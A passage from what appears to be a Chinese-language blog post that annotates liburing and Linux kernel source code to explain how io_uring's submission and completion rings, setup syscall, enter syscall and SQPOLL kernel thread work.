cq->kring_mask = cq->ring_ptr + p->cq_off.ring_mask;
cq->kring_entries = cq->ring_ptr + p->cq_off.ring_entries;
cq->koverflow = cq->ring_ptr + p->cq_off.overflow;
cq->cqes = cq->ring_ptr + p->cq_off.cqes;
if (p->cq_off.flags)
cq->kflags = cq->ring_ptr + p->cq_off.flags;

sq->ring_mask = *sq->kring_mask;
sq->ring_entries = *sq->kring_entries;
cq->ring_mask = *cq->kring_mask;
cq->ring_entries = *cq->kring_entries;
}

io_uring_get_sqe

此函数用来获取一个可用 sqe 用来提交任务,最终是调用了 _io_uring_get_sqe, 整个函数用非常优雅的方式实现了循环队列// #Elegant

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
IOURINGINLINE struct io_uring_sqe *_io_uring_get_sqe(struct io_uring *ring)
{
struct io_uring_sq *sq = &ring->sq;
unsigned int head, next = sq->sqe_tail + 1;
int shift = 0;

if (ring->flags & IORING_SETUP_SQE128)
shift = 1;
if (!(ring->flags & IORING_SETUP_SQPOLL))
head = IO_URING_READ_ONCE(*sq->khead);
else
head = io_uring_smp_load_acquire(sq->khead);
// 通过原子读获取head
// sq->khead = sq->ring_ptr + p->sq_off.head;
// 这里实际上读的是共享内存的一个指针内存的 uint 值

if (next - head <= sq->ring_entries) {
struct io_uring_sqe *sqe;

sqe = &sq->sqes[(sq->sqe_tail & sq->ring_mask) << shift];
// sq->ring_mask 来自kernel 设置的params
// rings->sq_ring_mask = p->sq_entries - 1;
// 由于sq_entries 为2的幂次倍
// 这里实际上就是一个循环队列的访问,
sq->sqe_tail = next;
return sqe;
}

return NULL;
}

io_uring_prep_xxx

这是一个系列函数, 用来实现 io_uring 提供的各种 io操作, 其根本实现是 设置 一个 sqe 结构体(这个结构体是内核的API),

这里以 io_uring_prep_openat 为例

1
2
3
4
5
6
7
IOURINGINLINE void io_uring_prep_openat(struct io_uring_sqe *sqe, int dfd,
const char *path, int flags,
mode_t mode)
{
io_uring_prep_rw(IORING_OP_OPENAT, sqe, dfd, path, mode, 0);
sqe->open_flags = (__u32) flags;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
IOURINGINLINE void io_uring_prep_rw(int op, struct io_uring_sqe *sqe, int fd,
const void *addr, unsigned len,
__u64 offset)
{
sqe->opcode = (__u8) op;
// 设置op为 open
sqe->flags = 0
sqe->ioprio = 0;
sqe->fd = fd;
// 提供表示dir 的 -100 fd
sqe->off = offset;
// 0
sqe->addr = (unsigned long) addr;
// 提供文件地址
sqe->len = len;
sqe->rw_flags = 0;
sqe->buf_index = 0;
sqe->personality = 0;
sqe->file_index = 0;
sqe->addr3 = 0;
sqe->__pad2[0] = 0;
}

归根结底就是设置了一个sqe

这里笔者有一个问题:
#TODO
IORING_SETUP_SQROLL时, io_uring用户和内核采用共享内存通信,内核态是如何知道一个sqe的全部参数已经设置完毕了,有没有可能用户态正在设置sqe的部分成员时,内核已经在处理这个sqe了?

在之后 [[#__io_uring_flush_sq]] 笔者似乎找到了这个问题的答案:

  • 通过 memory_store_release 保证sqe的更新不会被重排到 ktail 的修改前
  • 通过 修改 ktail 表示真正提交了一个任务

io_uring_submit

io_uring_submit 用于提交一个任务

1
2
3
4
int io_uring_submit(struct io_uring *ring)
{
return __io_uring_submit_and_wait(ring, 0);
}
1
2
3
4
5
static int __io_uring_submit_and_wait(struct io_uring *ring, unsigned wait_nr)
{
return __io_uring_submit(ring, __io_uring_flush_sq(ring), wait_nr, false);
}

最终到达 __io_uring_submit. 不过这个函数, 在SQPOLL模式下用处不大, 真正的提交操作应该说是在 __io_uring_flush_sq 中实现的.

这里主要是判断当前情况需不需要调用 io_uring_enter syscall.

如果当前 是IOPOLL模式, 就需要 io_uring_enter 来收割任务.

如果是 SQPOLL 模式, 且 内核处理线程已 idle ,那么就通过 io_uring_enter syscall 来唤醒

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
static int __io_uring_submit(struct io_uring *ring, unsigned submitted,
unsigned wait_nr, bool getevents)
{
bool cq_needs_enter = getevents || wait_nr || cq_ring_needs_enter(ring);
unsigned flags;
int ret;

flags = 0;
if (sq_ring_needs_enter(ring, submitted, &flags) || cq_needs_enter) {
if (cq_needs_enter)
flags |= IORING_ENTER_GETEVENTS;
if (ring->int_flags & INT_FLAG_REG_RING)
flags |= IORING_ENTER_REGISTERED_RING;

ret = __sys_io_uring_enter(ring->enter_ring_fd, submitted,
wait_nr, flags, NULL);
} else
ret = submitted;

return ret;
}

__io_uring_flush_sq

主要用来更新内核sq 的tail指针, 最终返回需要提交的任务数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
static unsigned __io_uring_flush_sq(struct io_uring *ring)
{
struct io_uring_sq *sq = &ring->sq;
unsigned tail = sq->sqe_tail;

if (sq->sqe_head != tail) {
sq->sqe_head = tail;
/*
* Ensure kernel sees the SQE updates before the tail update.
*/
if (!(ring->flags & IORING_SETUP_SQPOLL))
IO_URING_WRITE_ONCE(*sq->ktail, tail);
// 原子读
else
io_uring_smp_store_release(sq->ktail, tail);
// memory_release 的内存序来写

}
*/
return tail - *sq->khead;
}

在 SQPOLL 模式下,内核提交者可能同时在更新头指针。
对于非 SQPOLL 模式,应用自己更新头指针,不存在并发问题。
即使 SQPOLL 模式下,就算头指针读取是原子的,获取到的值也可能立即过期,存在并发修改的问题。

最坏情况下,读取的值会高估实际可提交的请求数。

在这里用到了一个原子写 IO_URING_WRITE_ONCE .

io_uring_smb_store_release 笔者涉及到内存序的问题,内存序是为了防止指令重排产生的,笔者还没有特别理解。

笔者尝试解释一下, 这里使用使用memory_order_release内存序标注这个存储操作

release内存序的特点是:

  1. 当前线程本地的修改对其他线程可见
  2. 防止存储操作被重新排序

这里应该是让此处对于sqe的修改,要在对于tail指针的修改前完成,防止指令重排的影响

如果是对于IOPOLL,内核的真正确认提交是在 io_uring_enter 实现的,其实是和当前处于同一个线程,因此不需要通过 memory_order_release 来保证 “当前线程本地的修改对其他线程可见”, 对同一线程的数据冒险应该是由旁路机制处理的

#TODO

1
2
3
#define io_uring_smp_store_release(p, v)			\
atomic_store_explicit((_Atomic __typeof__(*(p)) *)(p), (v), \
memory_order_release)

syscall

syscall是内核提供给用户态的接口,io_uring涉及三个syscall

笔者这里主要讲述前两个syscall

io_uring_setup

参数

  • entries: sq队列大小
  • params:提供的各种参数,许多返回值也会写入此结构体积
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
static long io_uring_setup(u32 entries, struct io_uring_params __user *params)
{
struct io_uring_params p;
int i;

if (copy_from_user(&p, params, sizeof(p)))
return -EFAULT;
// 将params复制到内核空间
for (i = 0; i < ARRAY_SIZE(p.resv); i++) {
if (p.resv[i])
return -EINVAL;
}

if (p.flags & ~(IORING_SETUP_IOPOLL | IORING_SETUP_SQPOLL |
IORING_SETUP_SQ_AFF | IORING_SETUP_CQSIZE |
IORING_SETUP_CLAMP | IORING_SETUP_ATTACH_WQ |
IORING_SETUP_R_DISABLED | IORING_SETUP_SUBMIT_ALL |
IORING_SETUP_COOP_TASKRUN | IORING_SETUP_TASKRUN_FLAG |
IORING_SETUP_SQE128 | IORING_SETUP_CQE32 |
IORING_SETUP_SINGLE_ISSUER | IORING_SETUP_DEFER_TASKRUN |
IORING_SETUP_NO_MMAP | IORING_SETUP_REGISTERED_FD_ONLY |
IORING_SETUP_NO_SQARRAY))
return -EINVAL;
// 如果有非法flag,直接返回

return io_uring_create(entries, &p, params);
}

接下来是首先检查entries 和flags。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
static __cold int io_uring_create(unsigned entries, struct io_uring_params *p,
struct io_uring_params __user *params)
{
struct io_ring_ctx *ctx;
struct io_uring_task *tctx;
struct file *file;
int ret;

if (!entries)
return -EINVAL;
if (entries > IORING_MAX_ENTRIES) {
if (!(p->flags & IORING_SETUP_CLAMP))
return -EINVAL;
entries = IORING_MAX_ENTRIES;
}

if ((p->flags & IORING_SETUP_REGISTERED_FD_ONLY)
&& !(p->flags & IORING_SETUP_NO_MMAP))
return -EINVAL;

设置sq_entries 以2的幂次向上取整, 这是为了方便环形队列的处理.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
p->sq_entries = roundup_pow_of_two(entries);
if (p->flags & IORING_SETUP_CQSIZE) {
/*
* If IORING_SETUP_CQSIZE is set, we do the same roundup
* to a power-of-two, if it isn't already. We do NOT impose
* any cq vs sq ring sizing.
*/
if (!p->cq_entries)
return -EINVAL;
if (p->cq_entries > IORING_MAX_CQ_ENTRIES) {
if (!(p->flags & IORING_SETUP_CLAMP))
return -EINVAL;
p->cq_entries = IORING_MAX_CQ_ENTRIES;
}
p->cq_entries = roundup_pow_of_two(p->cq_entries);
if (p->cq_entries < p->sq_entries)
return -EINVAL;
} else {
p->cq_entries = 2 * p->sq_entries;
}

接下来是一系列设置ctx的代码,笔者暂且不在这里分析,之后遇见了再分析每一项

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73

ctx = io_ring_ctx_alloc(p);
if (!ctx)
return -ENOMEM;

if ((ctx->flags & IORING_SETUP_DEFER_TASKRUN) &&
!(ctx->flags & IORING_SETUP_IOPOLL) &&
!(ctx->flags & IORING_SETUP_SQPOLL))
ctx->task_complete = true;

if (ctx->task_complete || (ctx->flags & IORING_SETUP_IOPOLL))
ctx->lockless_cq = true;

/*
* lazy poll_wq activation relies on ->task_complete for synchronisation
* purposes, see io_activate_pollwq()
*/
if (!ctx->task_complete)
ctx->poll_activated = true;

/*
* When SETUP_IOPOLL and SETUP_SQPOLL are both enabled, user
* space applications don't need to do io completion events
* polling again, they can rely on io_sq_thread to do polling
* work, which can reduce cpu usage and uring_lock contention.
*/
if (ctx->flags & IORING_SETUP_IOPOLL &&
!(ctx->flags & IORING_SETUP_SQPOLL))
ctx->syscall_iopoll = 1;

ctx->compat = in_compat_syscall();
if (!ns_capable_noaudit(&init_user_ns, CAP_IPC_LOCK))
ctx->user = get_uid(current_user());

/*
* For SQPOLL, we just need a wakeup, always. For !SQPOLL, if
* COOP_TASKRUN is set, then IPIs are never needed by the app.
*/
ret = -EINVAL;
if (ctx->flags & IORING_SETUP_SQPOLL) {
/* IPI related flags don't make sense with SQPOLL */
if (ctx->flags & (IORING_SETUP_COOP_TASKRUN |
IORING_SETUP_TASKRUN_FLAG |
IORING_SETUP_DEFER_TASKRUN))
goto err;
ctx->notify_method = TWA_SIGNAL_NO_IPI;
} else if (ctx->flags & IORING_SETUP_COOP_TASKRUN) {
ctx->notify_method = TWA_SIGNAL_NO_IPI;
} else {
if (ctx->flags & IORING_SETUP_TASKRUN_FLAG &&
!(ctx->flags & IORING_SETUP_DEFER_TASKRUN))
goto err;
ctx->notify_method = TWA_SIGNAL;
}

/*
* For DEFER_TASKRUN we require the completion task to be the same as the
* submission task. This implies that there is only one submitter, so enforce
* that.
*/
if (ctx->flags & IORING_SETUP_DEFER_TASKRUN &&
!(ctx->flags & IORING_SETUP_SINGLE_ISSUER)) {
goto err;
}

/*
* This is just grabbed for accounting purposes. When a process exits,
* the mm is exited and dropped before the files, hence we need to hang
* on to this mm purely for the purposes of being able to unaccount
* memory (locked/pinned vm). It's not used for anything else.
*/
mmgrab(current->mm);
ctx->mm_account = current->mm;

[[#io_allocate_scq_urings ]] 分配了scq和rings的内存

[[#io_sq_offload_create]] 创建了任务处理线程

1
2
3
4
5
6
7
8
9
10
11
ret = io_allocate_scq_urings(ctx, p);
if (ret)
goto err;

ret = io_sq_offload_create(ctx, p);
if (ret)
goto err;

ret = io_rsrc_init(ctx);
if (ret)
goto err;

设置sq_off,即通过 params 返回给用户的 ring 中各个成员的偏移

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
p->sq_off.head = offsetof(struct io_rings, sq.head);
p->sq_off.tail = offsetof(struct io_rings, sq.tail);
p->sq_off.ring_mask = offsetof(struct io_rings, sq_ring_mask);
p->sq_off.ring_entries = offsetof(struct io_rings, sq_ring_entries);
p->sq_off.flags = offsetof(struct io_rings, sq_flags);
p->sq_off.dropped = offsetof(struct io_rings, sq_dropped);
if (!(ctx->flags & IORING_SETUP_NO_SQARRAY))
p->sq_off.array = (char *)ctx->sq_array - (char *)ctx->rings;
p->sq_off.resv1 = 0;
if (!(ctx->flags & IORING_SETUP_NO_MMAP))
p->sq_off.user_addr = 0;

p->cq_off.head = offsetof(struct io_rings, cq.head);
p->cq_off.tail = offsetof(struct io_rings, cq.tail);
p->cq_off.ring_mask = offsetof(struct io_rings, cq_ring_mask);
p->cq_off.ring_entries = offsetof(struct io_rings, cq_ring_entries);
p->cq_off.overflow = offsetof(struct io_rings, cq_overflow);
p->cq_off.cqes = offsetof(struct io_rings, cqes);
p->cq_off.flags = offsetof(struct io_rings, cq_flags);
p->cq_off.resv1 = 0;

设置feature

1
2
3
4
5
6
7
p->features = IORING_FEAT_SINGLE_MMAP | IORING_FEAT_NODROP |
IORING_FEAT_SUBMIT_STABLE | IORING_FEAT_RW_CUR_POS |
IORING_FEAT_CUR_PERSONALITY | IORING_FEAT_FAST_POLL |
IORING_FEAT_POLL_32BITS | IORING_FEAT_SQPOLL_NONFIXED |
IORING_FEAT_EXT_ARG | IORING_FEAT_NATIVE_WORKERS |
IORING_FEAT_RSRC_TAGS | IORING_FEAT_CQE_SKIP |
IORING_FEAT_LINKED_FILE | IORING_FEAT_REG_REG_RING;

再将params复制回用户空间

1
2
3
4
if (copy_to_user(params, p, sizeof(*p))) {
ret = -EFAULT;
goto err;
}

最后是注册fd

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
if (ctx->flags & IORING_SETUP_SINGLE_ISSUER
&& !(ctx->flags & IORING_SETUP_R_DISABLED))
WRITE_ONCE(ctx->submitter_task, get_task_struct(current));

file = io_uring_get_file(ctx);
if (IS_ERR(file)) {
ret = PTR_ERR(file);
goto err;
}

ret = __io_uring_add_tctx_node(ctx);
if (ret)
goto err_fput;
tctx = current->io_uring;

/*
* Install ring fd as the very last thing, so we don't risk someone
* having closed it before we finish setup
*/
if (p->flags & IORING_SETUP_REGISTERED_FD_ONLY)
ret = io_ring_add_registered_file(tctx, file, 0, IO_RINGFD_REG_MAX);
else
ret = io_uring_install_fd(file);
if (ret < 0)
goto err_fput;

错误处理如下:

1
2
3
4
5
6
err:
io_ring_ctx_wait_and_kill(ctx);
return ret;
err_fput:
fput(file);
return ret;

io_allocate_scq_urings

首先是rings的分配,核心关键点在于NO_MMAP 的处理

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
static __cold int io_allocate_scq_urings(struct io_ring_ctx *ctx,
struct io_uring_params *p)
{
struct io_rings *rings;
size_t size, sq_array_offset;
void *ptr;

/* make sure these are sane, as we already accounted them */
ctx->sq_entries = p->sq_entries;
ctx->cq_entries = p->cq_entries;

size = rings_size(ctx, p->sq_entries, p->cq_entries, &sq_array_offset);
if (size == SIZE_MAX)
return -EOVERFLOW;

if (!(ctx->flags & IORING_SETUP_NO_MMAP))
rings = io_mem_alloc(size);
// 如果没有设置NO_MMAP,就分配
else
rings = io_rings_map(ctx, p->cq_off.user_addr, size);
// 反之,建立映射

if (IS_ERR(rings))
return PTR_ERR(rings);

ctx->rings = rings;

接下来是类似的,sqe的分配:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
if (!(ctx->flags & IORING_SETUP_NO_SQARRAY))
ctx->sq_array = (u32 *)((char *)rings + sq_array_offset);
rings->sq_ring_mask = p->sq_entries - 1;
rings->cq_ring_mask = p->cq_entries - 1;
rings->sq_ring_entries = p->sq_entries;
rings->cq_ring_entries = p->cq_entries;

if (p->flags & IORING_SETUP_SQE128)
size = array_size(2 * sizeof(struct io_uring_sqe), p->sq_entries);
else
size = array_size(sizeof(struct io_uring_sqe), p->sq_entries);
if (size == SIZE_MAX) {
io_rings_free(ctx);
return -EOVERFLOW;
}

if (!(ctx->flags & IORING_SETUP_NO_MMAP))
ptr = io_mem_alloc(size);
else
ptr = io_sqes_map(ctx, p->sq_off.user_addr, size);

if (IS_ERR(ptr)) {
io_rings_free(ctx);
return PTR_ERR(ptr);
}

ctx->sq_sqes = ptr;

io_sq_offload_create

如果设置了 SQPOLL, 用来创建内核收割任务的线程

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
__cold int io_sq_offload_create(struct io_ring_ctx *ctx,
struct io_uring_params *p)
{
int ret;

/* Retain compatibility with failing for an invalid attach attempt */
if ((ctx->flags & (IORING_SETUP_ATTACH_WQ | IORING_SETUP_SQPOLL)) ==
IORING_SETUP_ATTACH_WQ) {
struct fd f;

f = fdget(p->wq_fd);
if (!f.file)
return -ENXIO;
if (!io_is_uring_fops(f.file)) {
fdput(f);
return -EINVAL;
}
fdput(f);
}
if (ctx->flags & IORING_SETUP_SQPOLL) {
struct task_struct *tsk;
struct io_sq_data *sqd;
bool attached;

ret = security_uring_sqpoll();
if (ret)
return ret;

sqd = io_get_sq_data(p, &attached);
// 获取一个sqd
if (IS_ERR(sqd)) {
ret = PTR_ERR(sqd);
goto err;
}

ctx->sq_creds = get_current_cred();
ctx->sq_data = sqd;
ctx->sq_thread_idle = msecs_to_jiffies(p->sq_thread_idle);
if (!ctx->sq_thread_idle)
ctx->sq_thread_idle = HZ;
// 设置相关信息
io_sq_thread_park(sqd);
list_add(&ctx->sqd_list, &sqd->ctx_list);
io_sqd_update_thread_idle(sqd);
/* don't attach to a dying SQPOLL thread, would be racy */
ret = (attached && !sqd->thread) ? -ENXIO : 0;
io_sq_thread_unpark(sqd);

if (ret < 0)
goto err;
if (attached)
return 0;

if (p->flags & IORING_SETUP_SQ_AFF) {
int cpu = p->sq_thread_cpu;

ret = -EINVAL;
if (cpu >= nr_cpu_ids || !cpu_online(cpu))
goto err_sqpoll;
sqd->sq_cpu = cpu;
} else {
sqd->sq_cpu = -1;
}

sqd->task_pid = current->pid;
sqd->task_tgid = current->tgid;
tsk = create_io_thread(io_sq_thread, sqd, NUMA_NO_NODE);
// 创建处理线程
if (IS_ERR(tsk)) {
ret = PTR_ERR(tsk);
goto err_sqpoll;
}

sqd->thread = tsk;
ret = io_uring_alloc_task_context(tsk, ctx);
wake_up_new_task(tsk);
if (ret)
goto err;
} else if (p->flags & IORING_SETUP_SQ_AFF) {
/* Can't have SQ_AFF without SQPOLL */
ret = -EINVAL;
goto err;
}

return 0;
err_sqpoll:
complete(&ctx->sq_data->exited);
err:
io_sq_thread_finish(ctx);
return ret;
}

io_uring_enter

首先是对于flag的检查和确认,这里不一一赘述了,感兴趣的去看相应的man page更能了解

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
SYSCALL_DEFINE6(io_uring_enter, unsigned int, fd, u32, to_submit,
u32, min_complete, u32, flags, const void __user *, argp,
size_t, argsz)
{
struct io_ring_ctx *ctx;
struct fd f;
long ret;

if (unlikely(flags & ~(IORING_ENTER_GETEVENTS | IORING_ENTER_SQ_WAKEUP |
IORING_ENTER_SQ_WAIT | IORING_ENTER_EXT_ARG |
IORING_ENTER_REGISTERED_RING)))
return -EINVAL;

/*
* Ring fd has been registered via IORING_REGISTER_RING_FDS, we
* need only dereference our task private array to find it.
*/
if (flags & IORING_ENTER_REGISTERED_RING) {
struct io_uring_task *tctx = current->io_uring;

if (unlikely(!tctx || fd >= IO_RINGFD_REG_MAX))
return -EINVAL;
fd = array_index_nospec(fd, IO_RINGFD_REG_MAX);
f.file = tctx->registered_rings[fd];
f.flags = 0;
if (unlikely(!f.file))
return -EBADF;
} else {
f = fdget(fd);
if (unlikely(!f.file))
return -EBADF;
ret = -EOPNOTSUPP;
if (unlikely(!io_is_uring_fops(f.file)))
goto out;
}

ctx = f.file->private_data;
ret = -EBADFD;
if (unlikely(ctx->flags & IORING_SETUP_R_DISABLED))
goto out;

SQPOLL模式下,直接返回提交数,可选择性wakeup线程

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
/*
* For SQ polling, the thread will do all submissions and completions.
* Just return the requested submit count, and wake the thread if
* we were asked to.
*/
ret = 0;
if (ctx->flags & IORING_SETUP_SQPOLL) {
io_cqring_overflow_flush(ctx);

if (unlikely(ctx->sq_data->thread == NULL)) {
ret = -EOWNERDEAD;
goto out;
}
if (flags & IORING_ENTER_SQ_WAKEUP)
// 这个flag处于和用户态共享的内存
// 如果sq处理线程休眠了,并需要唤醒
// 可以通过设置 IORING_ENTER_SQ_WAKEUP, 再通过此syscall 来唤醒
wake_up(&ctx->sq_data->wait);
if (flags & IORING_ENTER_SQ_WAIT)
io_sqpoll_wait_sq(ctx);

ret = to_submit;

非SQPOLL模式,执行提交请求到SQ环

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
} else if (to_submit) {
ret = io_uring_add_tctx_node(ctx);
if (unlikely(ret))
goto out;

mutex_lock(&ctx->uring_lock);
ret = io_submit_sqes(ctx, to_submit);
// 直接提交 sqes
// 这个函数将在后面分析
// SQPOLL 模式下创建的io_sq_thread 也会调用此函数
if (ret != to_submit) {
mutex_unlock(&ctx->uring_lock);
goto out;
}
if (flags & IORING_ENTER_GETEVENTS) {
if (ctx->syscall_iopoll)
goto iopoll_locked;
/*
* Ignore errors, we'll soon call io_cqring_wait() and
* it should handle ownership problems if any.
*/
if (ctx->flags & IORING_SETUP_DEFER_TASKRUN)
(void)io_run_local_work_locked(ctx);
}
mutex_unlock(&ctx->uring_lock);
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
	if (flags & IORING_ENTER_GETEVENTS) {
// 如果请求获取完成事件
int ret2;

if (ctx->syscall_iopoll) {
// 如果开启了syscall轮询模式,执行iopoll逻辑
/*
* We disallow the app entering submit/complete with
* polling, but we still need to lock the ring to
* prevent racing with polled issue that got punted to
* a workqueue.
*/
mutex_lock(&ctx->uring_lock);
iopoll_locked:
ret2 = io_validate_ext_arg(flags, argp, argsz);
if (likely(!ret2)) {
min_complete = min(min_complete,
ctx->cq_entries);
ret2 = io_iopoll_check(ctx, min_complete);
}
mutex_unlock(&ctx->uring_lock);
} else {
const sigset_t __user *sig;
struct __kernel_timespec __user *ts;

ret2 = io_get_ext_arg(flags, argp, &argsz, &ts, &sig);
if (likely(!ret2)) {
min_complete = min(min_complete,
ctx->cq_entries);
ret2 = io_cqring_wait(ctx, min_complete, sig,
argsz, ts);
}
}

if (!ret) {
ret = ret2;

/*
* EBADR indicates that one or more CQE were dropped.
* Once the user has been informed we can clear the bit
* as they are obviously ok with those drops.
*/
if (unlikely(ret2 == -EBADR))
clear_bit(IO_CHECK_CQ_DROPPED_BIT,
&ctx->check_cq);
}
}
  • 如果请求获取完成事件
    • 如果开启了syscall轮询模式,执行iopoll逻辑
    • 否则执行等待完成事件逻辑

kernel

最后是io_uring 内核的任务处理, 在这里先给出一个流程图, 然后再具体分析各个函数

io_uring

图来自 https://zhuanlan.zhihu.com/p/380726590 , 侵删//

io_sq_thread | 内核任务提交机制

io_sq_thread是 SQPOLL 模式下内核任务轮询线程.
首先设置线程环境

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
static int io_sq_thread(void *data)
{
struct io_sq_data *sqd = data;
struct io_ring_ctx *ctx;
unsigned long timeout = 0;
char buf[TASK_COMM_LEN];
DEFINE_WAIT(wait);

snprintf(buf, sizeof(buf), "iou-sqp-%d", sqd->task_pid);
set_task_comm(current, buf);

/* reset to our pid after we've set task_comm, for fdinfo */
sqd->task_pid = current->pid;

if (sqd->sq_cpu != -1) {
set_cpus_allowed_ptr(current, cpumask_of(sqd->sq_cpu));
} else {
set_cpus_allowed_ptr(current, cpu_online_mask);
sqd->sq_cpu = raw_smp_processor_id();
}

接下来获取锁并进入无限循环

1
2
mutex_lock(&sqd->lock);
while (1) {

设置好timeout

1
2
3
4
5
6
if (io_sqd_events_pending(sqd) || signal_pending(current)) {
if (io_sqd_handle_event(sqd))
break;
timeout = jiffies + sqd->sq_thread_idle;
// sq_thread_idle 来自用户在 params 设置的时间
}

注意到这个线程创建在内存分配好之后, 即,即使是第一次进入此线程, 如果 sqes对应内存有任务,也会处理任务, 意味着在 io_uring_setup 之前,在sqes写好的任务,也可以被处理

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
cap_entries = !list_is_singular(&sqd->ctx_list);
// 获取是否有多个io_ring的标记cap_entries
list_for_each_entry(ctx, &sqd->ctx_list, sqd_list) {
// 遍历注册的io_ring,调用__io_sq_thread做实际的轮询操作
int ret = __io_sq_thread(ctx, cap_entries);

if (!sqt_spin && (ret > 0 || !wq_list_empty(&ctx->iopoll_list)))
sqt_spin = true;
// 如果有事件处理或iopoll任务,则设置sqt_spin标记
}
if (io_run_task_work())
// 调用io_run_task_work处理排队的工作任务
sqt_spin = true;

if (sqt_spin || !time_after(jiffies, timeout)) {
// 如果有待处理事件或时间没超时
if (sqt_spin)
timeout = jiffies + sqd->sq_thread_idle;
// 如果有待处理事件,更新下一次超时时间
if (unlikely(need_resched())) {
// 检查是否需要调度,如果需要,主动释放并重新获取锁
mutex_unlock(&sqd->lock);
cond_resched();
mutex_lock(&sqd->lock);
sqd->sq_cpu = raw_smp_processor_id();
}
continue;
// 没超时就直接continue, 因为之后就是判断是否需要阻塞
}

接下来实现io_uring SQ线程的阻塞和唤醒逻辑

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
	prepare_to_wait(&sqd->wait, &wait, TASK_INTERRUPTIBLE);
// 将当前线程设置为可中断状态TASK_INTERRUPTIBLE
if (!io_sqd_events_pending(sqd) && !task_work_pending(current)) {
bool needs_sched = true;
// 检查是否有待处理事件和任务

list_for_each_entry(ctx, &sqd->ctx_list, sqd_list) {
// 若没有则遍历所有注册的io_ring
atomic_or(IORING_SQ_NEED_WAKEUP,
&ctx->rings->sq_flags);
// 设置IORING_SQ_NEED_WAKEUP标志
if ((ctx->flags & IORING_SETUP_IOPOLL) &&
!wq_list_empty(&ctx->iopoll_list)) {
// 检查iopoll和SQ队列是否为空
needs_sched = false;
break;
}

/*
* Ensure the store of the wakeup flag is not
* reordered with the load of the SQ tail
*/
smp_mb__after_atomic();

if (io_sqring_entries(ctx)) {
needs_sched = false;
break;
}
}

if (needs_sched) {
// 如果需要调度
mutex_unlock(&sqd->lock);
// 释放锁调度
schedule();
mutex_lock(&sqd->lock);
// 唤醒后重新获取锁和CPU信息
sqd->sq_cpu = raw_smp_processor_id();
}
list_for_each_entry(ctx, &sqd->ctx_list, sqd_list)
atomic_andnot(IORING_SQ_NEED_WAKEUP,
&ctx->rings->sq_flags);
// 否则清除唤醒标记
}
finish_wait(&sqd->wait, &wait);
timeout = jiffies + sqd->sq_thread_idle;
// 更新等待时间
}

最后是退出无限循环时的清理机制

1
2
3
4
5
6
7
8
9
io_uring_cancel_generic(true, sqd);
sqd->thread = NULL;
list_for_each_entry(ctx, &sqd->ctx_list, sqd_list)
atomic_or(IORING_SQ_NEED_WAKEUP, &ctx->rings->sq_flags);
io_run_task_work();
mutex_unlock(&sqd->lock);

complete(&sqd->exited);
do_exit(0);

__io_sq_thread

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
static int __io_sq_thread(struct io_ring_ctx *ctx, bool cap_entries)
{
unsigned int to_submit;
int ret = 0;

to_submit = io_sqring_entries(ctx);
/* if we're handling multiple rings, cap submit size for fairness */
if (cap_entries && to_submit > IORING_SQPOLL_CAP_ENTRIES_VALUE)
to_submit = IORING_SQPOLL_CAP_ENTRIES_VALUE;
// 计算需要提交的任务数量
// 如果需要公平,则 cap 为固定最大值

if (!wq_list_empty(&ctx->iopoll_list) || to_submit) {
// 如果有 iopoll 任务或可提交请求
const struct cred *creds = NULL;

if (ctx->sq_creds != current_cred())
creds = override_creds(ctx->sq_creds);
// 保存和恢复 creds 身份信息避免安全漏洞
mutex_lock(&ctx->uring_lock);
// 上锁保护关键区
if (!wq_list_empty(&ctx->iopoll_list))
io_do_iopoll(ctx, true);
// 处理 iopoll 轮询事件
/*
* Don't submit if refs are dying, good for io_uring_register(),
* but also it is relied upon by io_ring_exit_work()
*/
if (to_submit && likely(!percpu_ref_is_dying(&ctx->refs)) &&
!(ctx->flags & IORING_SETUP_R_DISABLED))
ret = io_submit_sqes(ctx, to_submit);
// 提交请求到 SQ 环
mutex_unlock(&ctx->uring_lock);

if (to_submit && wq_has_sleeper(&ctx->sqo_sq_wait))
wake_up(&ctx->sqo_sq_wait);
